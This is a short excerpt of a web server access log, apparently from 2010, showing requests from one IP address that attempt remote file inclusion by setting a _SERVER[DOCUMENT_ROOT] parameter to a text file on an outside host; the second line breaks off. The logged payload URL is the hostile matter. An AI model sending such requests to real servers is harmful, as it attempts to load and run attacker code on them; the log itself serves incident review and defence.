66.103.128.44 - - [08/Feb/2010:02:14:42 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [08/Feb/2010:02:14:42 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sar